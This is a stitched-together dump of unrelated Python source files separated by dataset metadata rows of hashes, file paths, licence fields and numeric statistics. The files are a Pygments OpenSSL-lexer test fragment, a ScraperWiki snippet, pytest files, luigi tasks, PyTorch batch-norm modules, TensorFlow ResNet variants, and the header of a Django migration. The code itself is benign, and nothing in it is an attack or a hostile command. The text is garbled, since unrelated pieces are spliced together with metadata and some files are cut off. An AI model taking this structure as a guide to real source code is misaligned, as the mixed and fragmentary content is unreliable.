self.assertEqual(tokens[2], (T_SPACE, ' '))
self.assertEqual(tokens[3], (token.String, 'foo'))
self.assertEqual(tokens[4], (T_SPACE, '\n'))
def test_lex_incomplete_include_directive(self):
from pygments import token
tokens = self.lex('.include\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('.include\n.include foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_incomplete_include_directive_and_operator(self):
from pygments import token
tokens = self.lex('.include =\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
tokens = self.lex('.include =\n.include = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
self.assertEqual(tokens[4], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Operator, '='))
self.assertEqual(tokens[7], (T_SPACE, ' '))
self.assertEqual(tokens[8], (token.String, 'foo'))
self.assertEqual(tokens[9], (T_SPACE, '\n'))
def test_lex_incomplete_include_directive_string(self):
from pygments import token
tokens = self.lex('.include', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
tokens = self.lex('.include\n.include foo', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
| 44.229706
| 78
| 0.61248
| 3,081
| 25,609
| 4.977929
| 0.029211
| 0.295364
| 0.41351
| 0.112278
| 0.976397
| 0.971116
| 0.96603
| 0.949795
| 0.925148
| 0.877355
| 0
| 0.015521
| 0.204967
| 25,609
| 578
| 79
| 44.306228
| 0.73777
| 0
| 0
| 0.719222
| 0
| 0
| 0.088566
| 0.001718
| 0
| 0
| 0
| 0
| 0.652268
| 1
| 0.099352
| false
| 0
| 0.103672
| 0
| 0.220302
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e266a4dd685f7a44198b8b2e69e0b9f5243a9772
| 516
|
py
|
Python
|
data/train/python/e266a4dd685f7a44198b8b2e69e0b9f5243a9772toms_sql_test_scraper.py
|
harshp8l/deep-learning-lang-detection
|
2a54293181c1c2b1a2b840ddee4d4d80177efb33
|
[
"MIT"
] | 84
|
2017-10-25T15:49:21.000Z
|
2021-11-28T21:25:54.000Z
|
data/train/python/e266a4dd685f7a44198b8b2e69e0b9f5243a9772toms_sql_test_scraper.py
|
vassalos/deep-learning-lang-detection
|
cbb00b3e81bed3a64553f9c6aa6138b2511e544e
|
[
"MIT"
] | 5
|
2018-03-29T11:50:46.000Z
|
2021-04-26T13:33:18.000Z
|
data/train/python/e266a4dd685f7a44198b8b2e69e0b9f5243a9772toms_sql_test_scraper.py
|
vassalos/deep-learning-lang-detection
|
cbb00b3e81bed3a64553f9c6aa6138b2511e544e
|
[
"MIT"
] | 24
|
2017-11-22T08:31:00.000Z
|
2022-03-27T01:22:31.000Z
|
# -*- coding: utf8 -*-
import scraperwiki
scraperwiki.sqlite.save(['name'], {'name': 'Tom'})
scraperwiki.sqlite.save(['name'], {'name': 'Dick'})
scraperwiki.sqlite.save(['name'], {'name': 'Harry'})
scraperwiki.sqlite.save(['name'], {'name': 'Məclisi'})
# -*- coding: utf8 -*-
import scraperwiki
scraperwiki.sqlite.save(['name'], {'name': 'Tom'})
scraperwiki.sqlite.save(['name'], {'name': 'Dick'})
scraperwiki.sqlite.save(['name'], {'name': 'Harry'})
scraperwiki.sqlite.save(['name'], {'name': 'Məclisi'})
| 22.434783
| 54
| 0.627907
| 56
| 516
| 5.785714
| 0.196429
| 0.419753
| 0.518519
| 0.617284
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.004274
| 0.093023
| 516
| 22
| 55
| 23.454545
| 0.688034
| 0.079457
| 0
| 1
| 0
| 0
| 0.216102
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
e2b5520566fdc720522151563fc6e1c3695c9078
| 147
|
py
|
Python
|
tests/rapid_clay_formations_fab/test_nothing.py
|
gramaziokohler/rapid_clay_formations_fab
|
a8f9b32486d83a3e066eaadaa41bd4dab822c1cd
|
[
"MIT"
] | null | null | null |
tests/rapid_clay_formations_fab/test_nothing.py
|
gramaziokohler/rapid_clay_formations_fab
|
a8f9b32486d83a3e066eaadaa41bd4dab822c1cd
|
[
"MIT"
] | 35
|
2020-10-24T20:22:31.000Z
|
2022-02-28T13:05:10.000Z
|
tests/rapid_clay_formations_fab/test_nothing.py
|
gramaziokohler/rapid_clay_formations_fab
|
a8f9b32486d83a3e066eaadaa41bd4dab822c1cd
|
[
"MIT"
] | 2
|
2020-10-15T09:13:27.000Z
|
2020-10-27T09:22:03.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
def test_nothing():
assert True
| 18.375
| 38
| 0.829932
| 19
| 147
| 5.631579
| 0.631579
| 0.280374
| 0.448598
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.14966
| 147
| 7
| 39
| 21
| 0.856
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.2
| true
| 0
| 0.6
| 0
| 0.8
| 0.2
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2c60115991eea676bd9f2889782b320f4312cbe9
| 2,548
|
py
|
Python
|
tasks/calculators/page.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
tasks/calculators/page.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
tasks/calculators/page.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
import os
import luigi
import pandas as pd
from tasks.collectors.revision import CollectRevisions
class CalculatePageFirstEditDate(luigi.Task):
file_name = 'page_first_edit_date.h5'
data_dir = luigi.Parameter(default=r'../../data/sme')
def output(self):
return luigi.LocalTarget(path=os.path.join(self.data_dir, self.file_name), format='h5')
def requires(self):
return [CollectRevisions(data_dir=self.data_dir)]
def run(self):
revs_df = pd.read_hdf(self.input()[0].path, mode='r')
if isinstance(revs_df, pd.DataFrame):
grouped = revs_df.groupby(by='page_id')
data = []
for page_id, group in grouped:
data.append([page_id, group['timestamp'].min()])
df = pd.DataFrame(data=data, columns=['page_id', 'first_edit_date'])
df.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
class CalculatePageLastEditDate(luigi.Task):
file_name = 'page_last_edit_date.h5'
data_dir = luigi.Parameter(default=r'D:\data\sme')
def output(self):
return luigi.LocalTarget(path=os.path.join(self.data_dir, self.file_name), format='h5')
def requires(self):
return [CollectRevisions(data_dir=self.data_dir)]
def run(self):
revs_df = pd.read_hdf(self.input()[0].path, mode='r')
if isinstance(revs_df, pd.DataFrame):
grouped = revs_df.groupby(by='page_id')
data = []
for page_id, group in grouped:
data.append([page_id, group['timestamp'].max()])
df = pd.DataFrame(data=data, columns=['page_id', 'last_edit_date'])
df.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
class CalculatePageTotalEdits(luigi.Task):
file_name = 'page_total_edits.h5'
data_dir = luigi.Parameter(default=r'D:\data\sme')
def output(self):
return luigi.LocalTarget(path=os.path.join(self.data_dir, self.file_name), format='h5')
def requires(self):
return [CollectRevisions(data_dir=self.data_dir)]
def run(self):
revs_df = pd.read_hdf(self.input()[0].path, mode='r')
if isinstance(revs_df, pd.DataFrame):
grouped = revs_df.groupby(by='page_id')
data = []
for page_id, group in grouped:
data.append([page_id, len(group)])
df = pd.DataFrame(data=data, columns=['page_id', 'total_edits'])
df.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
| 37.470588
| 95
| 0.634615
| 358
| 2,548
| 4.337989
| 0.192737
| 0.067611
| 0.063748
| 0.054089
| 0.861558
| 0.820992
| 0.820992
| 0.820992
| 0.755312
| 0.725048
| 0
| 0.004523
| 0.218995
| 2,548
| 67
| 96
| 38.029851
| 0.775879
| 0
| 0
| 0.673077
| 0
| 0
| 0.085557
| 0.017661
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173077
| false
| 0
| 0.076923
| 0.115385
| 0.538462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
e2bd29b4fea59c33680a06d84a429ec95cb7b822
| 1,768
|
py
|
Python
|
tests/test_updater.py
|
yoannmos/Inupdater
|
0c8e7e3f72e9089432a4fac07b1206f395b7baab
|
[
"MIT"
] | null | null | null |
tests/test_updater.py
|
yoannmos/Inupdater
|
0c8e7e3f72e9089432a4fac07b1206f395b7baab
|
[
"MIT"
] | 3
|
2021-09-08T06:46:16.000Z
|
2021-09-08T07:38:00.000Z
|
tests/test_updater.py
|
yoannmos/Inupdater
|
0c8e7e3f72e9089432a4fac07b1206f395b7baab
|
[
"MIT"
] | null | null | null |
"""Updater Test File"""
import pytest
from inupdater.updater import Exefile
class TestExefile:
def test_equal_pass(self):
exe_dict_1 = {
"path": "appexemple",
"version": "0.0.1",
}
exe_dict_2 = {
"path": "appexemple1",
"version": "0.0.1",
}
exe_1 = Exefile(**exe_dict_1)
exe_2 = Exefile(**exe_dict_2)
assert exe_1 == exe_2
def test_lt_pass(self):
exe_dict_1 = {
"path": "appexemple",
"version": "0.0.1",
}
exe_dict_2 = {
"path": "appexemple1",
"version": "0.0.2",
}
exe_1 = Exefile(**exe_dict_1)
exe_2 = Exefile(**exe_dict_2)
assert exe_1 < exe_2
def test_le_pass(self):
exe_dict_1 = {
"path": "appexemple",
"version": "0.0.1",
}
exe_dict_2 = {
"path": "appexemple1",
"version": "0.0.2",
}
exe_1 = Exefile(**exe_dict_1)
exe_2 = Exefile(**exe_dict_2)
assert exe_1 <= exe_2
def test_gt_pass(self):
exe_dict_1 = {
"path": "appexemple",
"version": "0.1.8",
}
exe_dict_2 = {
"path": "appexemple1",
"version": "0.0.2",
}
exe_1 = Exefile(**exe_dict_1)
exe_2 = Exefile(**exe_dict_2)
assert exe_1 > exe_2
def test_ge_pass(self):
exe_dict_1 = {
"path": "appexemple",
"version": "8.5.1",
}
exe_dict_2 = {
"path": "appexemple1",
"version": "8.4.9",
}
exe_1 = Exefile(**exe_dict_1)
exe_2 = Exefile(**exe_dict_2)
assert exe_1 >= exe_2
| 24.555556
| 37
| 0.463235
| 212
| 1,768
| 3.533019
| 0.150943
| 0.186916
| 0.106809
| 0.100134
| 0.862483
| 0.861148
| 0.861148
| 0.81976
| 0.77036
| 0.719626
| 0
| 0.070093
| 0.394796
| 1,768
| 71
| 38
| 24.901408
| 0.629907
| 0.009615
| 0
| 0.587302
| 0
| 0
| 0.151862
| 0
| 0
| 0
| 0
| 0
| 0.079365
| 1
| 0.079365
| false
| 0.079365
| 0.031746
| 0
| 0.126984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e2dec239eb5fa5cdb4e6239179497d15dc75a02a
| 7,619
|
py
|
Python
|
Small_BatchNorm.py
|
wang3702/barlowtwins
|
6d1dc9d31f8f3c87fa4148b7dada0fe9e34805d1
|
[
"MIT"
] | null | null | null |
Small_BatchNorm.py
|
wang3702/barlowtwins
|
6d1dc9d31f8f3c87fa4148b7dada0fe9e34805d1
|
[
"MIT"
] | null | null | null |
Small_BatchNorm.py
|
wang3702/barlowtwins
|
6d1dc9d31f8f3c87fa4148b7dada0fe9e34805d1
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.distributed as dist
class Small_BatchNorm(nn.Module):
def __init__(self,
num_group,
num_features,
eps=1e-05,
momentum=0.1,
affine=True,
track_running_stats=True):
super(Small_BatchNorm, self).__init__()
self.num_group = num_group
self.num_features = num_features
self.eps = eps
self.momentum = momentum
self.affine = affine
self.track_running_stats = track_running_stats
#G*C normalization weigh and error
if self.affine:
self.weight = nn.Parameter(torch.ones([num_features])) #only C dimension keep
self.bias = nn.Parameter(torch.zeros([num_features]))
else:
self.register_parameter('weight', None)
self.register_parameter('bias', None)
if self.track_running_stats:
self.register_buffer('running_mean', torch.zeros([1,self.num_group,num_features]))
self.register_buffer('running_var', torch.ones([1,self.num_group,num_features]))
else:
self.register_buffer('running_mean', None)
self.register_buffer('running_var', None)
self.reset_parameters()
def extra_repr(self):
return 'num_groups={}, num_features={}, eps={}, momentum={}'.\
format(self.num_group, self.num_features, self.eps, self.momentum)
def reset_parameters(self):
if self.affine:
self.weight.data.fill_(1)
self.bias.data.zero_()
if self.track_running_stats:
self.running_mean.zero_()
self.running_var.fill_(1)
def normalize(self, input):
"""
input shape
N*C
Args:
input:
Returns:
"""
cur_batch_size, num_features = input.shape
input = torch.reshape(input, (-1, self.num_group, self.num_features)) # (N, G, C)
var, mean = torch.var_mean(input, dim=0, keepdim=True, unbiased=False)
input = (input - mean) / torch.sqrt(var + self.eps)
if self.track_running_stats:
self.running_mean = self.running_mean * (1. - self.momentum) + mean.detach() * self.momentum
self.running_var = self.running_var * (1. - self.momentum) + var.detach() * self.momentum
if self.affine:
input = input * self.weight + self.bias
input = input.view(cur_batch_size,num_features)
return input
def normalize_bn(self,input):
var, mean = torch.var_mean(input, dim=0, keepdim=True, unbiased=False)
input = (input - mean) / torch.sqrt(var + self.eps)
if self.track_running_stats:
self.running_mean = self.running_mean * (1. - self.momentum) + mean[None,:,:].detach() * self.momentum
self.running_var = self.running_var * (1. - self.momentum) + var[None,:,:].detach() * self.momentum
if self.affine:
input = input * self.weight + self.bias
return input
def forward(self, input,group=True):
if group:
return self.normalize(input)
else:
return self.normalize_bn(input)
class Small_BatchNormSN(nn.Module):
def __init__(self,
num_group,
num_features,
eps=1e-05,
momentum=0.1,
affine=True,
track_running_stats=True):
super(Small_BatchNormSN, self).__init__()
self.num_group = num_group
self.num_features = num_features
self.eps = eps
self.momentum = momentum
self.affine = affine
self.track_running_stats = track_running_stats
#G*C normalization weigh and error
if self.affine:
self.weight = nn.Parameter(torch.ones([num_features])) #only C dimension keep
self.bias = nn.Parameter(torch.zeros([num_features]))
else:
self.register_parameter('weight', None)
self.register_parameter('bias', None)
if self.track_running_stats:
self.register_buffer('running_mean', torch.zeros([self.num_group,1,num_features]))
self.register_buffer('running_var', torch.ones([self.num_group,1,num_features]))
else:
self.register_buffer('running_mean', None)
self.register_buffer('running_var', None)
self.reset_parameters()
def extra_repr(self):
return 'num_groups={}, num_features={}, eps={}, momentum={}'.\
format(self.num_group, self.num_features, self.eps, self.momentum)
def reset_parameters(self):
if self.affine:
self.weight.data.fill_(1)
self.bias.data.zero_()
if self.track_running_stats:
self.running_mean.zero_()
self.running_var.fill_(1)
def normalize(self, input):
"""
input shape
N*C
Args:
input:
Returns:
"""
if len(input.shape)==2:
mode=0
cur_batch_size, num_features = input.shape
input = torch.reshape(input,
(self.num_group, cur_batch_size // self.num_group, self.num_features)) # (G,N, C)
elif len(input.shape)==3:
mode=1
cur_batch_size, num_features,height = input.shape
input = torch.reshape(input,
(self.num_group, cur_batch_size // self.num_group, self.num_features,height)) # (G,N, C,H)
elif len(input.shape)==4:
mode=2
cur_batch_size, num_features, height,width = input.shape
input = torch.reshape(input,
(self.num_group, cur_batch_size // self.num_group, self.num_features,
height,width)) # (G,N, C,H,W)
else:
print("input shape is not suppored: ",input.shape)
print("only support 2D, 3D, 4D shape tensor for normalization")
exit()
if mode==0:
var, mean = torch.var_mean(input, dim=1, keepdim=True, unbiased=False)
elif mode==1:
var, mean = torch.var_mean(input, dim=[1,3], keepdim=True, unbiased=False)
else:
var, mean = torch.var_mean(input, dim=[1,3,4], keepdim=True, unbiased=False)
input = (input - mean) / torch.sqrt(var + self.eps)
if self.track_running_stats:
if mode==1:
mean = mean[:,:,:,0]
var = var[:,:,:,0]
elif mode==2:
mean = mean[:, :, :, 0,0]
var = var[:, :, :, 0,0]
self.running_mean = self.running_mean * (1. - self.momentum) + mean.detach() * self.momentum
self.running_var = self.running_var * (1. - self.momentum) + var.detach() * self.momentum
if mode==0:
input = input.view(cur_batch_size,num_features)
elif mode==1:
input = input.view(cur_batch_size, num_features,height)
elif mode==2:
input = input.view(cur_batch_size, num_features, height,width)
if self.affine:
if mode==0:
input = input * self.weight + self.bias
elif mode==1:
input = input * self.weight[None, :, None] + self.bias[None, :, None]
elif mode==2:
input = input * self.weight[None, :, None,None] + self.bias[None, :, None,None]
return input
def forward(self, input):
return self.normalize(input)
| 36.280952
| 125
| 0.56766
| 919
| 7,619
| 4.51469
| 0.108814
| 0.079537
| 0.049168
| 0.045553
| 0.862618
| 0.851048
| 0.781634
| 0.772234
| 0.74765
| 0.689805
| 0
| 0.01113
| 0.316052
| 7,619
| 209
| 126
| 36.454545
| 0.78507
| 0.031106
| 0
| 0.708861
| 0
| 0
| 0.040909
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06962
| false
| 0
| 0.018987
| 0.018987
| 0.151899
| 0.012658
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2f990c73be35297ebe083a648a9e12e43a3cc95
| 112
|
py
|
Python
|
py_ioc/__init__.py
|
sha31dev/py_ioc
|
755fd434a409e4bc6ca7bd5969d9b9d13739b8d3
|
[
"MIT"
] | null | null | null |
py_ioc/__init__.py
|
sha31dev/py_ioc
|
755fd434a409e4bc6ca7bd5969d9b9d13739b8d3
|
[
"MIT"
] | null | null | null |
py_ioc/__init__.py
|
sha31dev/py_ioc
|
755fd434a409e4bc6ca7bd5969d9b9d13739b8d3
|
[
"MIT"
] | null | null | null |
from py_ioc.src.container import Container
from py_ioc.src.scope import Scope
from py_ioc.src.main import build
| 28
| 42
| 0.839286
| 21
| 112
| 4.333333
| 0.428571
| 0.197802
| 0.296703
| 0.395604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 112
| 3
| 43
| 37.333333
| 0.91
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3944bbbbbc8805a7a3ab322c04a733ba1d0fdf1c
| 8,340
|
py
|
Python
|
custom_resnet.py
|
Shirhe-Lyh/mask_rcnn_customized
|
bf4b7393a59e35e8d8347ff6ce57a78150ed722c
|
[
"Apache-2.0"
] | 10
|
2019-01-25T05:18:52.000Z
|
2022-03-24T01:50:27.000Z
|
custom_resnet.py
|
Shirhe-Lyh/mask_rcnn_customized
|
bf4b7393a59e35e8d8347ff6ce57a78150ed722c
|
[
"Apache-2.0"
] | null | null | null |
custom_resnet.py
|
Shirhe-Lyh/mask_rcnn_customized
|
bf4b7393a59e35e8d8347ff6ce57a78150ed722c
|
[
"Apache-2.0"
] | 1
|
2020-04-23T02:25:53.000Z
|
2020-04-23T02:25:53.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 27 09:48:59 2018
@author: shirhe-lyh
"""
from tensorflow.contrib.slim import nets
resnet_v1_block = nets.resnet_v1.resnet_v1_block
resnet_v2_block = nets.resnet_v2.resnet_v2_block
def resnet_v1_17(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
reuse=None,
scope='resnet_v1_17'):
"""ResNet-17 model. See resnet_v1() for arg and return description.
Args:
inputs: A tensor of size [batch, height_in, width_in, channels].
num_classes: Number of predicted classes for classification tasks.
If 0 or None, we return the features before the logit layer.
is_training: whether batch_norm layers are in training mode. If this
is set to None, the callers can specify slim.batch_norm's
is_training parameter from an outer slim.arg_scope.
global_pool: If True, we perform global average pooling before
computing the logits. Set to True for image classification, False
for dense prediction.
output_stride: If None, then the output will be computed at the nominal
network stride. If output_stride is not None, it specifies the
requested ratio of input to output spatial resolution.
reuse: whether or not the network and its variables should be reused.
To be able to reuse 'scope' must be given.
scope: Optional variable_scope.
Returns:
net: A rank-4 tensor of size [batch, height_out, width_out,
channels_out]. If global_pool is False, then height_out and
width_out are reduced by a factor of output_stride compared to
the respective height_in and width_in, else both height_out and
width_out equal one. If num_classes is 0 or None, then net is
the output of the last ResNet block, potentially after global
average pooling. If num_classes a non-zero integer, net contains
the pre-softmax activations.
end_points: A dictionary from components of the network to the
corresponding activation.
Raises:
ValueError: If the target output_stride is not valid.
"""
blocks = [
resnet_v1_block('block1', base_depth=64, num_units=1, stride=2),
resnet_v1_block('block2', base_depth=128, num_units=1, stride=2),
resnet_v1_block('block3', base_depth=256, num_units=2, stride=2),
resnet_v1_block('block4', base_depth=512, num_units=1, stride=1)
]
return nets.resnet_v1.resnet_v1(
inputs,
blocks,
num_classes,
is_training,
global_pool=global_pool,
output_stride=output_stride,
reuse=reuse,
scope=scope)
def resnet_v1_20(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
spatial_squeeze=True,
store_non_strided_activations=False,
reuse=None,
scope='resnet_v1_20'):
"""ResNet-20 model. See resnet_v1() for arg and return description."""
blocks = [
resnet_v1_block('block1', base_depth=64, num_units=1, stride=2),
resnet_v1_block('block2', base_depth=128, num_units=1, stride=2),
resnet_v1_block('block3', base_depth=256, num_units=1, stride=2),
resnet_v1_block('block4', base_depth=512, num_units=3, stride=1)
]
return nets.resnet_v1.resnet_v1(
inputs,
blocks,
num_classes,
is_training,
global_pool=global_pool,
output_stride=output_stride,
include_root_block=True,
reuse=reuse,
scope=scope)
def resnet_v2_14(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
reuse=None,
scope='resnet_v2_14'):
"""ResNet-14 model. See resnet_v2() for arg and return description.
Args:
inputs: A tensor of size [batch, height_in, width_in, channels].
num_classes: Number of predicted classes for classification tasks.
If None we return the features before the logit layer.
is_training: whether batch_norm layers are in training mode.
global_pool: If True, we perform global average pooling before
computing the logits. Set to True for image classification,
False for dense prediction.
output_stride: If None, then the output will be computed at the
nominal network stride. If output_stride is not None, it specifies
the requested ratio of input to output spatial resolution.
reuse: whether or not the network and its variables should be reused.
To be able to reuse 'scope' must be given.
scope: Optional variable_scope.
Returns:
net: A rank-4 tensor of size [batch, height_out, width_out,
channels_out]. If global_pool is False, then height_out and
width_out are reduced by a factor of output_stride compared to the
respective height_in and width_in, else both height_out and
width_out equal one. If num_classes is None, then net is the
output of the last ResNet block, potentially after global average
pooling. If num_classes is not None, net contains the pre-softmax
activations.
end_points: A dictionary from components of the network to the
corresponding activation.
Raises:
ValueError: If the target output_stride is not valid.
"""
blocks = [
resnet_v2_block('block1', base_depth=64, num_units=1, stride=2),
resnet_v2_block('block2', base_depth=128, num_units=1, stride=2),
resnet_v2_block('block3', base_depth=256, num_units=1, stride=2),
resnet_v2_block('block4', base_depth=512, num_units=1, stride=1)
]
return nets.resnet_v2.resnet_v2(
inputs,
blocks,
num_classes,
is_training,
global_pool,
output_stride,
include_root_block=True,
reuse=reuse,
scope=scope)
def resnet_v2_17(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
reuse=None,
scope='resnet_v2_17'):
"""ResNet-17 model. See resnet_v2() for arg and return description."""
blocks = [
resnet_v2_block('block1', base_depth=64, num_units=1, stride=2),
resnet_v2_block('block2', base_depth=128, num_units=1, stride=2),
resnet_v2_block('block3', base_depth=256, num_units=2, stride=2),
resnet_v2_block('block4', base_depth=512, num_units=1, stride=1)
]
return nets.resnet_v2.resnet_v2(
inputs,
blocks,
num_classes,
is_training,
global_pool,
output_stride,
include_root_block=True,
reuse=reuse,
scope=scope)
def resnet_v2_20(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
reuse=None,
scope='resnet_v2_17'):
"""ResNet-17 model. See resnet_v2() for arg and return description."""
blocks = [
resnet_v2_block('block1', base_depth=64, num_units=1, stride=2),
resnet_v2_block('block2', base_depth=128, num_units=2, stride=2),
resnet_v2_block('block3', base_depth=256, num_units=2, stride=2),
resnet_v2_block('block4', base_depth=512, num_units=1, stride=1)
]
return nets.resnet_v2.resnet_v2(
inputs,
blocks,
num_classes,
is_training,
global_pool,
output_stride,
include_root_block=True,
reuse=reuse,
scope=scope)
| 40.289855
| 80
| 0.604436
| 1,070
| 8,340
| 4.494393
| 0.162617
| 0.049906
| 0.028072
| 0.046787
| 0.931171
| 0.917862
| 0.909753
| 0.909753
| 0.909545
| 0.894157
| 0
| 0.037813
| 0.32458
| 8,340
| 206
| 81
| 40.485437
| 0.815906
| 0.432974
| 0
| 0.798319
| 0
| 0
| 0.042533
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042017
| false
| 0
| 0.008403
| 0
| 0.092437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
46bba2828f16626ba194e30638fd1040710afbe0
| 98
|
py
|
Python
|
pystatic/sitepkg.py
|
pystatic/pystatic
|
e93d372e46adf8a8f697a71b80f3c88d26272607
|
[
"MIT"
] | null | null | null |
pystatic/sitepkg.py
|
pystatic/pystatic
|
e93d372e46adf8a8f697a71b80f3c88d26272607
|
[
"MIT"
] | null | null | null |
pystatic/sitepkg.py
|
pystatic/pystatic
|
e93d372e46adf8a8f697a71b80f3c88d26272607
|
[
"MIT"
] | null | null | null |
import site
def get_sitepkg():
return [site.getusersitepackages()] + site.getsitepackages()
| 16.333333
| 64
| 0.734694
| 10
| 98
| 7.1
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 98
| 5
| 65
| 19.6
| 0.845238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
46ca9d8d86a96cdde4cddd1edf881fe558073040
| 11,763
|
py
|
Python
|
biserici_inlemnite/biserici/migrations/0024_auto_20210803_1534.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
biserici_inlemnite/biserici/migrations/0024_auto_20210803_1534.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
biserici_inlemnite/biserici/migrations/0024_auto_20210803_1534.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
